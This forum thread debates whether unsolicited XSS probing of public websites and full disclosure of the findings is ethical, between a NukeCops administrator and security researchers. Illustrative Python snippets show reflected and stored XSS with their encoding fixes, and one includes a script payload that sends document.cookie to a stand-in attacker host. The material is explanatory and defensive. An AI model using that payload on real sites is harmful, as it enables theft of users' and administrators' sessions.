As it seems this started on this board, I will post this here. I hope that's okay.
http://sla.ckers.org/forum/read.php?3,44,1292#msg-1292

First, I am one of the administrators on NukeCops. I don't run the server, nor do I generally handle the day-to-day administration, but I hope to start a discussion with you.

I have only just seen this blog and this site, so I am trying to understand exactly what you do, and I would like to reply:
http://ha.ckers.org/blog/20060930/nukecops-attempts-to-shut-hackersorg-down/
Despite maluc not wanting to email me, I should have had my email readily available. Ghost's message has led me here.

I do understand the need to notify people about their vulnerabilities. But hitting every script on the site with such tests, without any confirmation from the site owners to run them, is just wrong. In the extreme, it can be taken as an immediate malicious search for vulnerabilities to exploit - something we are trying to deal with from the many script kiddies using known automated exploits. These bots are causing massive damage, and thus the only response to such activity is to report it directly to the offender's ISP.

It was, in fact, a standard response that I sent after doing a simple whois. I do not visit every site that attempts such attacks - I imagine doing that would take an enormous amount of time. Rather, given the nature of XSS exploits and the ha.ckers.org name, the obvious intent looked harmful to me.

I have deleted lots and lots of reports generated by the scripts you are using, and other phpNuke sites running security systems such as Nuke Sentinel will likely see the same pattern. It does not help your cause and will only inflame other people against you.

Having said that, I do appreciate you disclosing holes in the software. While I do not have any say on the original phpNuke product (which FB releases with many many many security problems), I do want help with fixing and patching the software. Test it on the code we are putting out - even on a test site, if you want one provided. But don't test it on people's public production sites... that will just bring out the hackers, who will notice the chain of such attempts and use them in their own malicious actions.

My own perspective was that a site that professes to have a clue about security got rubbed the wrong way, and its first reaction wasn't to fix the problem but to blame the messenger. Sending an email to someone else's provider - which, depending on the site, could be their livelihood - trying to shut them down is pretty fucking lame.

Neither RSnake nor I are in any way dependent on this site, and it costs us quite a bit of effort every day to maintain it, but there are many people who are dependent on their domain/servers/virtual presence for their income. Automatically sending out a message asking an ISP to shut someone down over an issue on your own site is beyond just rude.

First off, welcome to the forums evader, and thanks for taking the time to discuss your views directly. And as you've likely already guessed, i'm going to disagree with your last statement..

Much akin to port-scanning, which is not illegal (IANAL), entering non-normal inputs on a public website, or wget-ing with query strings that are usually never sent, is completely benign. If someone signs up for a new account name as MrSunshine!@#$%^&*()\/>< and it inadvertently crashes your server .. then you may have reason to claim downtime losses. However, searching for the string asdf'e"e>e<e changes nothing on your server (aside from access logs), nor does it negatively impact it in any way. To quote an old adage: 'No Harm, No Foul'.
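For what it's worth, the check such a probe performs is trivial to illustrate. Below is a rough Python sketch (the pages are simulated strings rather than real HTTP responses, and the helper names are my own invention) of what "no filtering" means - the marker string comes back byte-for-byte:

```python
import html

# The harmless marker string from the post: plain text plus the HTML
# metacharacters any output filter would need to encode.
PROBE = "asdf'e\"e>e<e"

def reflects_unescaped(page_body: str) -> bool:
    # True if the probe comes back verbatim -- a hint that the site
    # echoes user input with no output encoding at all.
    return PROBE in page_body

# A site that does filter would echo the HTML-encoded form instead.
encoded = html.escape(PROBE, quote=True)

# Simulated search-result pages from an unfiltered and a filtered site:
unfiltered_page = "<p>No results for " + PROBE + "</p>"
filtered_page = "<p>No results for " + encoded + "</p>"
```

Nothing here writes to the server; the probe only shows up in its own response (and the access log), which is the whole point.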

My personal purpose for testing major sites that I and others visit is to raise awareness of how insecure most every substantial website is. I am not counting the quilting site my grandmother visits http://mars.ark.com/~quilting/ .. From what i've seen, maybe 20% of major sites have no signs of filtering at all. Another 30% or so - yes, i pulled these percentages out of my ass - filter the two main places, Search and Login, and ignore everything else. That means registration forms, feedback messages, forgot-password boxes, newsletter signups, contest entries, etc, are all vulnerable to arbitrary injection. Most disheartening though, is that certainly fewer than 5% of the websites i've checked have come through a once-over with no exploitable vulnerabilities.

That is what gives me nightmares.. (that, or a mixture of vodka and Saved By The Bell reruns). To think, any website i visit could potentially have a hidden iframe that uses CSRF to exploit an XSS hole on http://neopets.com and force me to send them my prized Kougra..
Isn't he cute~?

I don't know how i could continue on living, should that happen - not to mention my bank's website or my email host.

So yes, i am guilty of spamming the logs of many of the websites i posted about on http://sla.ckers.org/forum/read.php?3,44 with scary-looking alert and <script> strings inside the page requests. Did i scare some of the admins into thinking their site was under attack? I certainly hope so. If 19 out of 20 of those admins have a hole on their site that a malicious person can use against them or their users, they ought to be scared. If they were competent, they could see where the pen-testing ended .. and locate their flaws. As a user myself, i'm sad to see that most every webmaster i entrust with my passwords and personal information has no sense of web application security.

But back to your last statement, that we should only test your software and not your public-facing production site - i strongly disagree. The site that promotes the product is just as much their software as the product itself. Likewise, there is no download for my bank's website source code .. so i'm unable to test it on a test server in isolation. But i'll be damned if i take them at their word that no one can transfer $500 out of my account every time i visit their blog site.

The moral is: Don't hurt those who want to help you, and leave my Kougra out of this.

I guess most people only partially agree with your posting.
It's true that full disclosure without first reporting to the people responsible is not a nice way to do it.
But XSS has been a well-known vulnerability for more than 6 years now; see
http://www.cert.org/advisories/CA-2000-02.html
It has been constantly ignored by managers and most web developers since then. Meanwhile, XSS is used for sophisticated phishing attacks where the attacked user has no clue what's going on, nor can they identify the attack *before* it takes place. That's a real problem for the majority of internet users, who are usually not technically experienced.

Now let's read your own text:

<cite>
I do understand the need to notify people about their vulnerabilities. But hitting every script on the site with such tests, without any confirmation from the site owners to run them, is just wrong. In the extreme, it can be taken as an immediate malicious search for vulnerabilities to exploit - something we are trying to deal with from the many script kiddies using known automated exploits. These bots are causing massive damage, and thus the only response to such activity is to report it directly to the offender's ISP.
</cite>

and we see that you wrote about the problem yourself - one which most admins (including yourself?) do not take care of: script kiddies penetrating just for fun, using ready-to-use tools and exploits. Does anyone with criminal intent ask you before starting such scripts? I doubt it.
Why do web developers consistently ignore these threats and continue to implement vulnerable web pages?
Why do pen testers and nice people get attacked by hedge lawyers when they send a kind reminder about such vulnerabilities?

After 6 years of education about XSS and its descendants like CSRF, web pages *must not* have such simple holes.

As companies won't spend money on secure web sites, but will spend it on hedge lawyers, there are not many alternatives to full disclosure without warning. XSS is still too simple to pull off. These companies get what they want: publicity.

And I also have to agree with maluc that testing for XSS is *not illegal*, unless it is written on each and every page where it should not be done.
But if I found a page with such a warning, I'd be pretty sure that it is insecure and never visit it again ;-)

Furthermore - or worse, it depends ... - maluc wrote:
> .. guilty of spamming the logs of many of those websites ..
most admins are not aware that another kind of attack is possible: second-order code injection, which might enable attackers to take over an admin session if the admin interface to the web server (or whatever) is a web GUI.
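To sketch what second-order injection looks like (a hypothetical Python illustration - the attacker URL and the render functions below are invented for the example): the payload is stored quietly via a public form, and only fires later, when an unencoded admin GUI displays it inside the admin's own session:

```python
import html

# An attacker submits this through a public form (a comment, a
# registration field) and the site stores it as-is. Nothing visible
# happens yet -- that is what makes the injection "second order".
stored = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'

def admin_log_unsafe(entries):
    # Vulnerable rendering: stored input lands unencoded in the admin's
    # web GUI, so the script fires inside the *admin's* session.
    return "".join("<li>" + e + "</li>" for e in entries)

def admin_log_safe(entries):
    # Encoding at output time renders the stored payload inert.
    return "".join("<li>" + html.escape(e) + "</li>" for e in entries)
```

The fix is the same as for reflected XSS - encode on output - it just has to be applied in the admin interface too, not only on public pages.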

I guess most companies would be well educated if they got rid of hedge lawyers, marketing and advertising people, and spent the money on good web developers - if security, including customer security, counts.

Moral: who is responsible for the vulnerabilities? For sure not the people who disclose them to you. You should be happy that you get this for free.
Does your hedge lawyer work for free?

Hello, Evaders99, and welcome to the board. I've got to say, I'm really happy that you took the time to write, and I wish this had come a few days ago - it would have saved us both some pain. That said, I have a few comments on what you said, as I'm sure you would have expected.

First, I would tend to agree with you that hitting every site function is wrong - but only if I believed the site being hit already had the security in place to protect me. What the people on this list are doing is proving what no one else does. As painful as it is to hear, you aren't secure. Nor is just about any other site on the Internet. So aside from spamming a log file or two, I believe what Ghozt and Maluc have done is raise your awareness of your insecurities. In the long run it's a small price to pay for a free penetration test you couldn't afford, or didn't want, to do yourself.

The fact that you said you don't go to every site that attempts these attacks is actually slightly troubling. What if the attack was coming from a Yahoo address? Would you ask their upstream to shut Yahoo down? I can redirect through Yahoo (and a host of other sites). It's irresponsible not to check the site and ensure that what you are demanding be shut down (via terms of service, copyright infringement, or otherwise) is actually a site that needs to be shut down. By your logic it would be extremely trivial to trick your logs into getting lots of benign organizations shut down.

Believe it or not, I'm not particularly worried about inflaming people who have security flaws in their software. Right now it's like the whole world is asleep at the helm. If their logs show some bad activity and indeed they are vulnerable to it, they should get inflamed and they should react (not against me or Ghozt or Maluc or anyone else but against the hole that they are vulnerable to). Don't you see? You're reacting to an itch by tearing off your arm. You're reacting to a symptom instead of fixing the cause.

Right now the internet is so riddled with holes that it doesn't matter what we do... they're going to be there either way. What this list does is raise awareness - and yours clearly is raised now too. So let's put down arms and work together to fix the issues.

I did not attempt to shut you guys down personally. I have detected many such scripting and other attacks from hosts before, and many of those I notify have stopped such JavaScript and other code coming from compromised servers and hacking groups. I don't have the time to personally visit and check out every JavaScript attack against my sites.
If it is someone like Yahoo doing the hosting, I will report it to their abuse department. Given that your whois was registered by proxy, and the thumbnail of the www.ckers.org site seemed to go nowhere, my impression was that this was a malicious hacking group.
http://whois.domaintools.com/ckers.org

I certainly understand you want to notify people of their problems. But do you want people to go around a neighborhood trying to open the windows and doors of houses when no one is home? Further, do you want them to clearly mark those openings for other people to exploit, without any notification to the owner?

At best, what you are doing is unethical. Malicious or not, I think you disrespect the people running the sites and their users. You could ask them beforehand (I would have easily said yes) and tell them in private what tests are done. Further, you mark these openings in a public forum for others to go after them.

I do take such concerns seriously, and I frequent the main sites such as SecurityFocus and Secunia. But such zero-day attacks (as seen against many products these days) only encourage other hackers to follow, and do not help any end user or their developers.

I don't question your motives, but your methods. You don't have to warn people about nuclear weapons by exploding a nuke. :) Even Sonic's own Network Abuse policy lists:
# Attempts to hack the Sonic.net, Inc. network or *HIGHLIGHT* any other network or systems *HIGHLIGHT*
# Port scanning
There are similar terms for other networks. Your host may not feel that this is illegal, but "ethical hacking" is still hacking. If the results of such hacking cause damage in any way, you could be liable ... at least under US law. I'm not saying that would ever realistically happen, but you are using the ends to justify the means.

Those are my complaints... I know you probably won't do anything. But I would like you to go through future releases of the software to check for such issues. :)
My suggestion would be to make a better main page telling people who you are, as well as what the issues are and how to get them resolved.

# Attempts to hack the Sonic.net, Inc. network or *HIGHLIGHT* any other network or systems *HIGHLIGHT*

Evader, in what way, shape, or form did i hack your network - or any other - by inputting asdf'e"e>e<e into your search box? Furthermore, last i checked i'm not affiliated with Sonic.net, nor did i use their server to type in that input. Now, I did send your website a request that made it then request ha.ckers.org/s.js, which is indeed located on Sonic's network - but if i made it request google.com, does that mean google is 'attacking' you? That's illogical at best, and completely retarded at worst. Maybe you don't understand exactly what reflected XSS is.. It means sending a request to a server and having it return a page altered however i see fit. Only me, myself, and i (and my imaginary friend Pedro) can view that page as altered. Anyone else on your site views it normally, and no files on your server have been altered. Where exactly were you 'hacked'? If anything, i hacked myself by proxy.
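To put "reflected" in concrete terms, here is a toy Python sketch of a search page (the handler and URLs are hypothetical, not the actual site's code). The payload lives only in the response to the request that carried it; nothing on the server is modified:

```python
import html
from urllib.parse import parse_qs, urlparse

def search_page(url: str, filtered: bool) -> str:
    # Toy search handler: it reflects the ?q= parameter straight back
    # into the response. Nothing on the server changes; the payload
    # exists only in this one response, for whoever sent the request.
    q = parse_qs(urlparse(url).query).get("q", [""])[0]
    if filtered:
        q = html.escape(q, quote=True)
    return "<html><body>Results for: " + q + "</body></html>"

attack_url = "http://example.test/search?q=<script>alert(1)</script>"
reflected = search_page(attack_url, filtered=False)   # script comes back live
defended = search_page(attack_url, filtered=True)     # script comes back inert
```

The danger to *other* users only appears when someone is tricked into clicking such a crafted URL themselves - which is exactly why the hole, not the person who demonstrates it, is the problem.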

Furthermore, if i tell the world that i found a secret invisible button on the back of Wells Fargo ATMs that dispenses all the money they hold, who is at fault here? The person who fondled the ATM (don't judge me. it's what i'm into.), or the company that shipped out ATMs with money-dispensing buttons? Your analogy is flawed in that the house's windows are not in the public domain. If they left signs above every window saying 'Try to Open Me', then yes, there is no problem in trying to lift them up, nor in telling others that they are unlocked. Likewise, any public website - and by public i mean a general agreement that anyone can visit, view, and utilize the non-member portions of your website - allows anyone to insert input and to request any pages they like. If you don't want them to access something, then you deny their request or alter it to an acceptable one. If i ask a bank teller for $50 for free (in a non-threatening way), and they happily give it to me .. who just cost the bank $50? Surely it wasn't me for requesting it; it was the bank teller for giving it out.

This is certainly not unethical. What's unethical is for websites which retain personal information divulged in confidence by users to design web pages full of holes that will disclose that personal information. Now obviously no one can be expected to write bug-free software, and any website should be forgiven such transgressions provided they exercise due diligence in securing private information. When AOL freely publishes the private search information of 600,000 individuals, that is definitely not due diligence in respecting their privacy.

And maybe you haven't been sliding deep enough through the intertubes, but not all hackers are evil. This forum does not discriminate by hat color nor intent, although most members seem to be the security-minded whitehat type. I don't know how to convince you that hacking isn't evil by nature, any more than owning a knife is evil. Yes, it gives you more power and the ability to do more destructive things.. but it comes down to intent. Should we outlaw all knives because some people get stabbed? You might find it tough to dig into that T-bone later.

We seem to envision two very different futures of an ideal internet - pardon me for putting words into your mouth here. You seem to envision one full of padded rooms, with everyone scurrying around in germless bubbles. I envision an internet full of scary man-eating monsters, with everyone walking safely past them carrying monster repellent. Don't leave home without it.

Evaders99, we understand your argument from the view of a manager responsible for a vulnerable site. But why are you upset at the people helping you, instead of blaming your web developers (or those responsible for their work)?

maluc gave you some more examples about ethics. To quote your "what you are doing is unethical" - you're barking up the wrong tree; think of the following:
*your* web site is unethical, 'cause the XSS flaw allows criminals to damage your customers'/visitors' browsers using *your* web site, which the visitor trusts.

"But such zero-day attacks"
There was no attack, as maluc already explained. The site was used in the intended manner; at least the site did not tell everyone that the input asdf'e"e>e<e is illegal and a violation of something, whatever.

Please familiarize yourself with XSS and how it works; the web site is the culprit, not its users! You could only argue that the user being shown the virtually defaced site is guilty herself, 'cause she called such a malicious URL. But then you render moot the core feature of HTML: links.

And finally, you might read Article 19 of the "Universal Declaration of Human Rights", Resolution 217 A (III), 10 December 1948.
And surprise: you'll see that it covered the internet ages before the internet was even known ;-)

My intention was to start a discussion. If I seem personally upset, I apologize ... I don't think all "hackers" are bad. Nor do I want to attempt to stop what you are doing.

We can agree to disagree on the ethics of this. I just hope you will make better policies such that webmasters are notified that you are using their site for such purposes. You cannot possibly require every site to have a clear disclaimer against "scanning for XSS vulnerabilities." No one is saying you don't have the right to do so. But as a matter of professional protocol, I think you'd have a lot more support with private disclosure and better information available.

Just the time it took me to figure out what this site is should be an indication of the issues you may have in the future.

(On a separate note, the Universal Declaration of Human Rights has no real legal basis. It is such a joke, especially with this clause:
- These rights and freedoms may in no case be exercised contrary to the purposes and principles of the United Nations.)

Yes, in a perfect world where most sites and software are secure and only a few bugs exist .. private disclosure is probably for the best, to keep evil people from using the otherwise public knowledge for malicious purposes. The problem is that the vast majority of websites are vulnerable, and almost every major software program has had some rather bad bugs in it. When everyone keeps all these issues hushed up .. it only hinders future software/websites as a whole. Currently, most 'web designers' - yes, even most of the ones who do it professionally .. hell, even the ones who do it professionally for web app security vendors - don't know how to properly prevent XSS. They're only vaguely aware, as a whole, that they even need to prevent such vulnerabilities.

That's grossly unacceptable. The purpose of that thread, in my own eyes, is to draw awareness in a more friendly way .. that these problems are widespread and that the intardnet is badly broken.

The digital world needs to realize how serious an issue XSS/SQL injection is - and web "masters" need to wake up to the world that is Input/Output Validation.

Public knowledge of this helps far more than it hurts. Sorry if you lose some face in the process.

Much of the problem is that they are never taught good (read as: secure) scripting practices. Here's a nice suggestion from w3schools.com, which to be fair is one of the best resources on the internet for learning web app languages.

Quote
Form Validation

User input should be validated on the browser whenever possible (by client scripts (JavaScript)). Browser validation is faster and you reduce the server load.

You should consider using server validation if the user input will be inserted into a database. ...

Everything needs to be validated server-side, otherwise it allows XSS. Easier on the server, yes, but a terrible thing to ever rely on the truthiness of the browser..
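A minimal Python sketch of the point (the signup handler and its limits are invented for illustration): the server repeats every check and encodes on output, because nothing guarantees the client-side JavaScript validation ever ran - a request forged with curl or wget skips the browser entirely:

```python
import html

def handle_signup(username: str) -> str:
    # Server-side handling (hypothetical form handler): never assume
    # the browser's JavaScript validation ran. Check constraints here,
    # on the server, where they cannot be bypassed.
    if not (1 <= len(username) <= 32):
        raise ValueError("bad username length")
    # Encode at output time so any markup in the name renders inertly.
    return "<p>Welcome, " + html.escape(username, quote=True) + "!</p>"
```

Client-side validation is fine as a convenience for honest users; it just can't be the only line of defense.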

> .. better policies such that webmasters are notified ..
IMHO that's exactly the point: the webmaster is usually not responsible for the flaws.
The disclosure should address the people responsible for the web site as a whole (corporate identity), and the people limiting or cutting off the budget for well-educated web developers. Not that w3schools.com is that bad, but if you have web developers on your payroll who use this resource to build your business web site, there's definitely something wrong.

> .. Universal Declaration of Human Rights has no real legal basis.
ok, we agree that most business-driven countries don't accept these ethics; no surprise: money rules.
That's exactly why we need full disclosure: money rules, and in this case it's money not spent on building secure web applications.
But why do you then complain? The information here is free ;-)

You see, we need some sarcasm too in the real world. In a perfect world there would be no web applications with XSS vulnerabilities allowing criminals to make their money for free. In such a perfect world it would be sufficient to inform the webmaster, 'cause the manager and webmaster and developer could count on each other.

> My intention was to start a discussion.
Here we go. Maybe someone finds this all OT, but when talking about security you have to take care of technical, social, ethical and business concerns, and bring them all together in practical solutions (web applications here).

Quote
Much of the problem is that they are never taught good (read as: secure) scripting practices.

I agree. I think there's much to be done in the way of proper scripting.
This is something you'll want to bring to the developers of the software.
I just hope you don't punish the end users by lighting up a vulnerability that they may not understand and really have no hope of fixing.

I find that most people install through pre-packaged installers such as Fantastico. They don't know what XSS is. They just want to build something for their users to use.

For example, there are ways to notify a homeowner that their back door is open:
- actually going through the door and putting up a sign that says "thieves enter here"
- or giving them a call and notifying them, as well as telling them who to talk to about it (say, a security expert?)

Quote
but when talking about security you have to take care of technical, social, ethical and business concerns, and bring them all together in practical solutions (web applications here).

I agree. It should be a plan that includes the webmasters, web hosts, and web developers, as well as security experts such as yourselves. Brute-forcing XSS checks on a site seems counter to that plan, just as port scanning without the network administrators being involved wouldn't be as effective.

Perhaps the problem I see is where you plan to go after the XSS has been attempted and disclosed. Does it go up to the developer of the software? Or up to sites such as SecurityFocus?

I see very little else about who you are; it took a while just to find the blog:
http://ha.ckers.org/blog/about/
That page does not give me much assurance about who you guys are, what your reputation is, or what you are doing on other sites.

Further, is there anything that prevents others from using your methods for malicious actions?

Quote
Further, is there anything that prevents others from using your methods for malicious actions?

Not particularly. But that is rather unstoppable. It's like writing a book called "Theory of Disemboweling" (who would write a book like that?) and being blamed when people use your techniques to kill someone - while you, the author, were just elaborating in theory about what could be done and ways to do it.

Quote
For example, there are ways to notify a homeowner that their back door is open:
- actually going through the door and putting up a sign that says "thieves enter here"

I am not a lawyer, but that is usually illegal when you gain full access to a server. However, this is exactly what an alert("XSS") does - and with such non-resident XSS, there is no trespassing on the computer as far as US law is concerned.

So yes, pointing out a vulnerability is not illegal. Exploiting it to gain access, even with good intentions, is. I try not to break the law, even when webmasters much like yourself misinterpret such good intentions.

I agree that the information can equally be used for bad things. However, you're missing the point. Finding these holes is ridiculously easy - pretty much any skript kiddie could do it. Disclosing the information hardly saves them much effort, but it does give the good guys the ability to collectively look at the results and point out the more interesting examples, without each of us having to go locate them.

The About page explaining what this forum is for is indeed non-existent. Then again, so is http://www.nukecops.com's, from what i see .. so right back at ya. We're not some ethical hacking group. We're not a group at all. It's just a public forum for experts, researchers, students, hackers, evil hackers, and the curious alike .. to discuss web app security, or the lack thereof.

I think Evader has 2 issues here:
- the scanning of sites for XSS (what evader calls "going through the door".)
- the public posting of the results (that'd be the "thieves enter here" sign.)

I believe the initial reaction of trying to get the "attacker" shut down was based entirely on the log, not on the public postings.

So it boils down to: Is it legal to scan a public site for XSS, and is it responsible?

IANAL, nor do I play one on forums, but the responsibility argument requires a few questions to be answered:
- Is the intent of the scan to cause damage?
- Is the effect of the scan to cause damage?
- Is the intent of the scan to ultimately improve the safety of a site's users?
- Is the effect of the scan to ultimately improve the safety of a site's users?

The first two questions are clearly no.
The third question is a yes, I believe.
What about the fourth?

While it's true that once the bugs that have been found are fixed, the users' safety has been improved, Evaders' criticism is that by publishing the bugs before notifying the site itself, the risk to users is actually increased during the period of time starting when the bug is publicized and ending when the bug gets fixed.

I can't help but agree with that view, which is why I make a point to try and notify sites first, and only publish once the problem is corrected.
The problem here is that it easily takes me 3 times as long to find a reasonable point of contact to report security issues to as it does to find the bug in the first place, which doesn't exactly make it easy for me to do the "right thing".

Ultimately, this falls back into the old "Full Disclosure" vs "Responsible Disclosure" argument.
I personally respect people on both side of that argument, as long as they pick their side for the right reasons.

Evaders99, I had a few comments regarding your last statement: "I see very little else about who you are, took a while just to find the blog"

I don't know how that would be possible. Firstly, you reported "ha.ckers.org/xss.js" - all you had to do was look at the root directory to find the blog. Oooor Google for "ckers.org", oooor look at the JS file itself, which names the root domain, oooor any one of a dozen other recon techniques. It's not exactly like I make any attempt to hide it or the other domains. But to your point, I should probably make it even more obvious for the people who have no recon skills, by putting up a 301 redirect from the root of www.ckers to the root of ha.ckers.

That said, I still think you didn't do nearly the diligence required (like emailing us if you had a problem with the site, or going after the person who actually performed the behavior you had a problem with, rather than the site they pointed to). As I said, without that basic recon, your process could be used to get you to target any website for take-down.

The aboutus page is primarily a joke. I haven't changed it much since the first day I put it up. It doesn't say one way or another what the purpose of the website is, only who is running it. If you had questions, both our emails were attached, though. But again, neither this website (nor its owners) did this to you, so it shouldn't matter what the point of this website is. If some other benign website had hosted that file, it shouldn't matter what their purpose was either.